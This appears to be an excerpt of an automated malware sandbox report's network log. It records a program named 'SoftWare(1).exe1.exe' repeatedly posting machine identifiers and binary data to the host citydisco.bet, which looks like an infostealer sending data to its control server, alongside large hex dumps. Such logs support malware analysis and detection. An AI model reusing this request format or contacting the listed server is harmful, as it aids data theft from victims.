2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 87 c8 35 f1 a5 69 f4 29 f3 e1 6a 48 12 41 bf 59 12 f1 33 b4 0a 3f a0 e8 4c fb bf 18 eb 95 1b c8 7a b0 dd ed 22 05 bf 3c 54 01 d2 a3 69 62 8f b1 36 f1 20 0d fe 70 10 ba 0c 1c a3 7b 8c 2e 30 3b d0 9c ef 91 dd d8 1d 86 62 1b e5 8c 8c f5 77 a6 1c 22 fc a3 39 ca 8e 3d b3 71 e3 1b 7d 3c bf b3 2e fc 3c 08 bd f2 85 d8 6d 40 2b 5b 33 bb 63 b1 6b e8 72 04 3e c3 d3 ff 38 77 9d e6 f8 6c 11 a7 bd b7 62 90 6a 09 3e 53 f0 56 c3 ea a4 2e 7a 87 49 db 07 2f 6d ca c5 ce 72 a3 60 4b 7d 1c 2f 62 84 14 ee 18 97 d4 39 9b 08 75 14 51 91 7f 79 ef 2a 11 c5 f9 c7 7f c4 65 f6 18 0a 04 15 8e c6 0c c7 ac 7c 1b 40 23 11 23 b3 8b 2c c3 a8 4f d9 46 4e 53 07 ee f3 d0 5b fb d1 c6 d0 3c e3 f5 f3 6f 86 8a 0a 15 37 80 39 99 02 b4 11 98 71 97 fb 05 51 29 d2 a0 57 81 8d 46 9e fe 04 77 59 5a 85 Data Ascii: 5i)jHAY3?Lz"<Tib6 p{.0;bw"9=q}<.<m@+[3ckr>8wlbj>SV.zI/mr`K}/b9uQy*e\|@##,OFNS[<o79qQ)WFwYZ
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 46 6c e3 bd 2b 54 aa 33 4d 8e a2 86 72 53 36 89 6d 10 fd a6 56 0f 1f bd 84 65 ad 68 89 e6 56 19 d4 65 8b 84 e1 cc 60 8b 2c fc 2c d9 bf f2 30 c8 7e 87 47 76 05 8e 39 30 5b 2e 01 d2 e1 9b 9f 05 1f 18 f1 14 28 fd c3 7d 80 a1 42 85 6c 6c d5 a2 c0 73 dc 64 f6 94 81 2d fe 8a 24 7e 12 c7 e7 9e 89 09 9d 4d 2e 43 8f 6a 96 ae 64 45 15 17 c0 79 17 a8 a7 13 e7 0b 36 ac 30 d3 9b ff af 17 af f1 c7 26 85 1b 41 20 61 20 df 56 c1 0e ef 6a 57 a4 a3 1e 07 a1 c3 f0 44 a5 5a 3b 9e 14 2f b8 3e ef d0 c0 75 c7 9e bc a7 66 00 3a 63 9d ee 33 3c 64 34 de e3 4a 66 a5 9d e9 79 45 0b 1e c3 19 23 9b 97 81 1a 41 61 d1 60 a0 43 bb 60 9d 0e 24 02 fc 95 86 8f 5e 77 a7 ee e8 42 af a0 42 e8 78 03 15 f7 d6 d4 e1 fc 5b 8c c0 73 7c 24 76 e8 03 9d 36 03 17 e8 3d 0a bc 7f 5b c0 28 e9 5e e5 26 e2 Data Ascii: Fl+T3MrS6mVehVe`,,0~Gv90[.(}Bllsd-$~M.CjdEy60&A a VjWDZ;/>uf:c3<d4JfyE#Aa`C`$^wBBx[s\|$v6=[(^&
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 5c 4c 58 89 30 51 6a ac 2a 39 f9 c7 8f 50 40 76 fd 21 aa c9 42 eb fc 01 67 00 be 79 65 60 ae b9 3a 70 87 53 a3 2e ed 7f 2f a1 e5 2a f3 f7 79 73 ff 59 d7 20 89 62 2f e6 61 96 64 61 5d ce f4 63 56 a0 bc 20 d1 75 12 83 92 9a 0e 53 ba b2 d4 7e 9a 3d 75 a1 0f ad 62 e4 0e 47 8a 16 c9 4b 18 21 bc e4 72 18 23 f4 74 44 16 ae ac b4 a2 9d 8a 37 a2 15 8e 5d 2d 2f 91 42 31 c9 91 4b b1 59 58 4d 49 9a 7d ab 07 1f 4d 60 15 26 ca 65 d7 9f 6f ab 62 e8 fa 39 0b d0 cb ac 4a 22 1e d3 b5 9f ee 67 32 27 90 69 22 2f 65 dd 79 8f 31 4b a9 a7 ba cd 9d 4f 0f 0a c4 15 db 3a a3 96 dd eb 63 26 7d 48 d1 fb c8 9a 1a 95 47 f0 05 88 06 9d 6f 70 51 e3 fe f6 48 01 70 ec 1e 7f c1 35 50 25 7d 9c 12 d8 6c 7b df 4d 31 13 a0 b7 83 e2 3c 7c 84 5f 55 2f 2e 35 67 c0 9a 6e 9c 4e 13 68 7b ed ad 4f 8d Data Ascii: \LX0Qj9P@v!Bgye`:pS./ysY b/ada]cV uS~=ubGK!r#tD7]-/B1KYXMI}M`&eob9J"g2'i"/ey1KO:c&}HGopQHp5P%}l{M1<\|_U/.5gnNh{O
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 24 14 97 e4 77 e4 f3 17 60 11 eb f3 7a e9 c5 97 07 3f e3 47 aa 3c 71 f0 d4 05 6f 5a 48 c8 c1 1b ec 46 88 9a 2c 78 83 3f e1 2b e9 6e 0e ff 8c a1 10 7d c8 55 ce e0 b5 3f d5 7b d5 7a c5 b9 a3 e6 b0 ec e1 9a ab 87 40 ad 7f c7 ff e7 bc 72 4f 96 b1 09 32 78 eb 8c fd a2 38 6b fc 8c 60 96 34 50 cf 7e d5 9d 8b 05 46 6d ea 98 e5 b5 ef 23 08 21 65 22 ac a2 7a 71 3a 16 cc c7 b2 00 a7 b9 8b 16 08 10 30 c4 18 79 a5 aa b6 41 77 6c d4 a6 35 79 87 25 ff 36 9b 96 2c cf 31 3e 7b 0b d5 db b1 dd cb e9 55 04 5d ec 47 f2 b5 6e de ef 30 1d 77 e9 fb 2a 7a 55 c7 11 99 0b 04 cc 5b f9 bb a2 49 c0 7d 4b 8e 33 46 24 2b 08 03 7d 14 55 f2 76 db f9 22 06 e5 22 30 45 a1 5c eb 5a 12 5c d6 99 e7 bc a6 a1 59 40 fc e0 e5 2c 9b 1d 48 fa 22 37 c5 6d 08 6a 40 e5 ff 73 bb 29 e2 4b 10 2a f8 54 65 Data Ascii: $w`z?G<qoZHF,x?+n}U?{z@rO2x8k`4P~Fm#!e"zq:0yAwl5y%6,1>{U]Gn0wzU[I}K3F$+}Uv""0E\Z\Y@,H"7mj@s)KTe
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: f1 49 7e d1 e7 0c 1a 34 5a a6 64 b6 dd 3f 47 37 80 86 b0 f3 85 55 9c c1 ba 98 62 03 7d b9 48 3a 55 58 25 83 b0 4b 17 85 ce 5c 1b fd c4 d2 17 e6 4f 0b d7 bd d0 8e 89 54 f9 8f 2e 08 88 9c b0 e0 a6 f5 cb 83 a4 97 5a f4 da f3 f3 44 cd 63 26 dc bc ed 70 2b bc c2 2c 25 0f 2e f2 e7 58 a3 e7 f0 da 9f db ae cf 86 09 de 88 af 15 7e 90 9b 80 ca 7b 3c b1 84 25 ee a9 a3 22 1f 39 a3 dd bb 28 da 3a 4c f4 da f0 46 2f 68 4c 6a 89 d8 5c e7 1e 33 ba 24 f6 4e 9e 66 26 8e 24 a7 eb cb da 62 5b e3 e0 be 72 5e 6d 6f bf 6a e9 e3 42 f1 93 60 8e a1 77 ab 82 f1 4b 5f b4 51 0e d9 cd fb 1e 45 f8 d3 b0 79 8a 13 f1 0f ab 44 71 f0 6c 57 79 a3 59 d5 72 69 7a f9 a3 fb 47 81 af 31 aa 4a 1f 11 3f 71 b5 ca 7b b1 41 fd 5b 87 c0 06 3f 2b 94 e1 84 00 ec d8 92 41 7f e7 a0 4f a0 9b 3d 5e 65 48 bf Data Ascii: I~4Zd?G7Ub}H:UX%K\OT.ZDc&p+,%.X~{<%"9(:LF/hLj\3$Nf&$b[r^mojB`wK_QEyDqlWyYrizG1J?q{A[?+AO=^eH
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 6a cc a1 a7 1d f4 5a 71 0a 23 f8 c2 5a 9e 1a f4 11 65 67 84 52 00 3c 14 1e 45 6e 6a e0 d9 7a 59 b1 20 e4 5a d4 6a ec d5 fb 72 4e 7b 0d 25 cf f3 b5 fd de 65 f2 0d 88 e4 9d 5a 9b 41 9a 2a 74 19 e5 4e 59 7a 09 d7 33 dd 01 42 6f 9f 78 5c 22 5d 04 68 6d d0 25 23 dd ed e7 e9 e4 7a 8b 44 73 ee 65 0f 23 9e 86 a4 b0 1c 1d df 43 58 7d a8 f8 33 34 fa c0 b2 5a 79 f1 c4 90 5f b9 8d 80 c3 ad 08 6c f5 00 cb 62 3e 2f e8 7d 44 0b eb 0e bb 87 f0 c3 e0 20 67 1a b2 2a cc ed 8a 40 19 2d 88 ae 41 58 82 04 ef f3 2d c7 2f 7e e0 6e 99 20 bc fb 1c da 58 28 c5 7b 6b 2d 9e ca b9 dc c4 13 6f 8e 24 5f 57 ee ab b2 dc d0 58 ed 3b 9b 5e c9 0d be 47 44 7b 6c fc b9 9d ac 84 1e 05 47 30 f8 ea 44 fc fa 53 94 d5 0e a3 35 03 f7 5f 12 94 0f 47 75 9c b5 6e 74 05 fc 4b b2 23 d9 3c d4 d2 79 7b f6 Data Ascii: jZq#ZegR<EnjzY ZjrN{%eZAtNYz3Box\"]hm%#zDse#CX}34Zy_lb>/}D g@-AX-/~n X({k-o$_WX;^GD{lG0DS5_GuntK#<y{
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 21 b2 17 a7 b6 70 b2 b4 06 09 f9 a4 e8 d2 fa 45 f0 1a 39 11 9b b0 d3 a3 8d 40 9c d4 54 ba 35 26 0f 28 85 9a a2 62 51 88 e2 95 e3 eb 6c d6 93 fd 7f 06 f8 c3 59 f9 83 d1 f0 03 95 d8 50 dd 76 be b7 25 f8 4e 21 12 33 f3 7c 78 f1 54 2f 43 ff e0 e8 e9 24 75 b2 bc 92 b1 74 f9 21 e7 26 4f 43 e6 08 ae 70 b7 ca be 6d ff 07 89 9a e5 c2 48 87 7f 7a c2 47 90 af ff 42 e6 15 60 ba 19 66 93 46 62 58 80 c2 18 52 a9 13 be a1 8d 02 1a c5 c5 5f fb 8b 55 b1 0e 3e 14 09 4f 88 40 00 2c 24 a9 47 fc 94 f3 88 2b 89 e1 32 e8 21 a3 f9 53 7b 1b 65 f3 9f c1 3d ae 62 9d e6 6a bb f7 0c eb 97 52 40 55 ac 72 8d cc ba 4f 32 9e 36 b5 e4 9c 70 33 36 74 d7 db f7 49 be 15 a3 63 51 42 25 b0 6b 50 e5 03 90 48 1a 63 33 d8 fd 8f df e9 d7 69 b9 e7 07 fa 93 53 e3 bc 68 e0 a3 ac 31 d2 6d 2e 25 e4 4e Data Ascii: !pE9@T5&(bQlYPv%N!3\|xT/C$ut!&OCpmHzGB`fFbXR_U>O@,$G+2!S{e=bjR@UrO26p36tIcQB%kPHc3iSh1m.%N
2025-03-13 12:33:27 UTC	1369	IN	Data Raw: 51 3c 44 e3 de 0e 77 27 ae ad c4 f5 7c 8f dd 16 bc 25 e6 15 03 23 3a 16 55 b3 09 ad 82 8d 65 d9 fc 11 f0 d1 90 65 1e 14 6d 6f cf 08 9e 49 2d 60 bc c1 bb 58 a6 78 fb e3 d4 d8 86 aa 4f c4 41 9d 43 e6 17 12 ad 43 4f 8d 13 48 8d 45 5d c9 85 70 1c 25 5a 70 4c 3d aa 01 9d 06 2b 52 74 59 95 d5 10 1f ff 91 0e a9 b4 9a 09 89 61 0e 33 c3 be 2d f7 c2 3c 05 16 67 af 45 8c fd 27 1f 53 83 9f bb e4 aa 90 ec d7 5c d8 80 2f 4e 17 7b 19 37 41 1d 17 69 c9 fb 3a f2 3a 4d 32 b9 a9 b3 0f e4 b4 3f 67 c9 57 26 7b 74 e3 2d 41 02 b5 c2 be 88 81 b3 23 c0 6b b5 8d 69 57 61 73 4d c0 eb eb 58 83 9e e8 2b 85 97 4b f3 5c 44 3b 81 5a ea 95 a0 03 02 a2 f4 3b 80 82 a2 96 48 b2 ce 05 f8 c9 5c 4b b9 d1 56 4d 82 4e 8f 6a eb ad 02 e9 11 a4 5d bd 87 c9 45 5f 54 95 42 3a 1e 27 d0 8c cf aa 8f 53 Data Ascii: Q<Dw'\|%#:UeemoI-`XxOACCOHE]p%ZpL=+RtYa3-<gE'S\/N{7Ai::M2?gW&{t-A#kiWasMX+K\D;Z;H\KVMNj]E_TB:'S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:29 UTC	276	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=J28v2iOMgLZ6s User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 14912 Host: citydisco.bet
2025-03-13 12:33:29 UTC	14912	OUT	Data Raw: 2d 2d 4a 32 38 76 32 69 4f 4d 67 4c 5a 36 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 0d 0a 2d 2d 4a 32 38 76 32 69 4f 4d 67 4c 5a 36 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 32 38 76 32 69 4f 4d 67 4c 5a 36 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 35 30 Data Ascii: --J28v2iOMgLZ6sContent-Disposition: form-data; name="uid"72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b--J28v2iOMgLZ6sContent-Disposition: form-data; name="pid"2--J28v2iOMgLZ6sContent-Disposition: form-data; name="hwid"A150
2025-03-13 12:33:30 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDOF1OhnsgRiqsEYfRkfJKTdCJjmw4YQ5lgmoIDZH3tchCbrB%2F%2F8g5MfGTIi3jI%2F0%2FrKirI7qd7JUhep7z4M9GLQCxBVHYh94PcHhzz8pg7xoVk7HlKJ0Jy6crHD4PYc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f618dc8876c-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13250&min_rtt=12941&rtt_var=4176&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15846&delivery_rate=203014&cwnd=249&unsent_bytes=0&cid=c47c299166a68ba7&ts=1075&x=0"
2025-03-13 12:33:30 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}
2025-03-13 12:33:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:32 UTC	272	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8Gs56iC9n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15041 Host: citydisco.bet
2025-03-13 12:33:32 UTC	15041	OUT	Data Raw: 2d 2d 38 47 73 35 36 69 43 39 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 0d 0a 2d 2d 38 47 73 35 36 69 43 39 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 47 73 35 36 69 43 39 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 35 30 45 45 39 35 33 41 31 42 42 45 44 44 Data Ascii: --8Gs56iC9nContent-Disposition: form-data; name="uid"72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b--8Gs56iC9nContent-Disposition: form-data; name="pid"2--8Gs56iC9nContent-Disposition: form-data; name="hwid"A150EE953A1BBEDD
2025-03-13 12:33:32 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THee5nF2IzOC4qcIxKOaMFoSiVsvZmNQH2hm4zK7VZyVzhfkl%2Bxmgy3GlAT2T0jfNRZbhw2hakLYTzNNEta%2BAfK6gmksA3Pspti115JIHEVLbw041HQd%2FwhYU%2BhUPLiU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f702912e24f-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13902&min_rtt=13694&rtt_var=4212&sent=18&recv=20&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15971&delivery_rate=198560&cwnd=245&unsent_bytes=0&cid=af4ff36016708c2c&ts=1074&x=0"
2025-03-13 12:33:32 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49708	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:34 UTC	273	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=X23YBNNYIo User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20535 Host: citydisco.bet
2025-03-13 12:33:34 UTC	15331	OUT	Data Raw: 2d 2d 58 32 33 59 42 4e 4e 59 49 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 0d 0a 2d 2d 58 32 33 59 42 4e 4e 59 49 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 32 33 59 42 4e 4e 59 49 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 35 30 45 45 39 35 33 41 31 42 42 Data Ascii: --X23YBNNYIoContent-Disposition: form-data; name="uid"72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b--X23YBNNYIoContent-Disposition: form-data; name="pid"3--X23YBNNYIoContent-Disposition: form-data; name="hwid"A150EE953A1BB
2025-03-13 12:33:34 UTC	5204	OUT	Data Raw: f0 64 01 66 98 e1 95 ef 14 ed 01 e1 b5 bd e6 4c d8 0f 35 05 6d 08 73 d3 6b 07 64 69 e3 4c dc d1 75 47 30 2a 46 df b4 e5 61 65 fd 0c cc ad cc f3 8a b3 34 21 bf ca 5c 54 ea 86 54 d9 38 eb 0a a7 8a 70 53 98 1c dc 64 80 d6 34 a5 60 8c dc e9 0b 69 b8 22 94 6b db 1e 1a 4d b4 46 9f 56 9f 3f 0a f1 7c 19 d4 d9 b7 b7 c9 46 80 8d 92 2f 54 5b c9 4a 13 16 e3 8c 6d 95 a1 cd ed c1 4f e9 47 3e 27 bc df fc f0 d1 61 2c 93 f8 be 6a 14 9f e6 f4 54 ae 34 3c 73 d2 5a d4 34 49 20 f9 6f c5 73 ce ab c0 a8 80 70 f2 4d 78 45 c9 46 81 3a 25 ef 97 20 da 10 61 c9 b6 67 a9 20 b0 04 fd 04 c5 13 b7 c8 b5 5f cb 17 89 34 06 27 a1 c3 63 dc 9c 4f d5 8c b9 5b f7 3e 5b b3 84 05 96 c3 0f a2 e6 51 10 08 0d 6e cf 99 b6 11 0f 54 2e 1c c5 ab f5 b6 75 c2 9d 98 4d ce a3 cd ba 15 e4 36 6f 96 8e 1f ed Data Ascii: dfL5mskdiLuG0*Fae4!\TT8pSd4`i"kMFV?\|F/T[JmOG>'a,jT4<sZ4I ospMxEF:% ag _4'cO[>[QnT.uM6o
2025-03-13 12:33:35 UTC	813	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gyuOZOawVOtdoStxDelM4j6xp1zTLncP8qUNp5Ik%2FtcH%2FRV3Um4hGcAx8I6X0gYINTrLzhYKALikJ2U8%2BoYlSzv1x1ztoB5KaR2hhajfbrYOO3lX1YquU%2BetVojTlk7c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f81288c78af-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13939&min_rtt=13871&rtt_var=4027&sent=22&recv=25&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21488&delivery_rate=203071&cwnd=250&unsent_bytes=0&cid=887fa919783605c6&ts=1261&x=0"
2025-03-13 12:33:35 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49709	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:37 UTC	273	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BVkqoVRd23d User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2606 Host: citydisco.bet
2025-03-13 12:33:37 UTC	2606	OUT	Data Raw: 2d 2d 42 56 6b 71 6f 56 52 64 32 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 0d 0a 2d 2d 42 56 6b 71 6f 56 52 64 32 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 56 6b 71 6f 56 52 64 32 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 35 30 45 45 39 35 33 41 Data Ascii: --BVkqoVRd23dContent-Disposition: form-data; name="uid"72ccc69330ea96770a98fad11f3418f4c49712a7e9c8cbc0fec1947b--BVkqoVRd23dContent-Disposition: form-data; name="pid"1--BVkqoVRd23dContent-Disposition: form-data; name="hwid"A150EE953A
2025-03-13 12:33:38 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFSANyu4xAAkBCirMWda0zrGalWwXEkrbeFAoSCNavtrrCX4awTs68S6FnEBTUYfBmn2EmzYgTPn6e9oijRAS9MXDS0UoDR%2FoMe%2B1gSaBeJ5KlYr1ZdieyyzV6gTgFBt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8f942fb8226a-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13847&min_rtt=13700&rtt_var=3982&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2832&recv_bytes=3515&delivery_rate=211248&cwnd=250&unsent_bytes=0&cid=7a5c9290b7bb5835&ts=893&x=0"
2025-03-13 12:33:38 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 36 2e 32 31 37 2e 32 34 30 2e 31 30 34 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 76.217.240.104"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49710	188.114.96.3	443	2340	C:\Users\user\Desktop\SoftWare(1).exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:39 UTC	276	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JkM2XnzkV90aH3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1090 Host: citydisco.bet
2025-03-13 12:33:39 UTC	1090	OUT	Data Raw: 2d 2d 4a 6b 4d 32 58 6e 7a 6b 56 39 30 61 48 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 32 63 63 63 36 39 33 33 30 65 61 39 36 37 37 30 61 39 38 66 61 64 31 31 66 33 34 31 38 66 34 63 34 39 37 31 32 61 37 65 39 63 38 63 62 63 30 66 65 63 31 39 34 37 62 0d 0a 2d 2d 4a 6b 4d 32 58 6e 7a 6b 56 39 30 61 48 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 6b 4d 32 58 6e 7a 6b 56 39 30 61 48 33 0d 0a 43 6f 6e 74 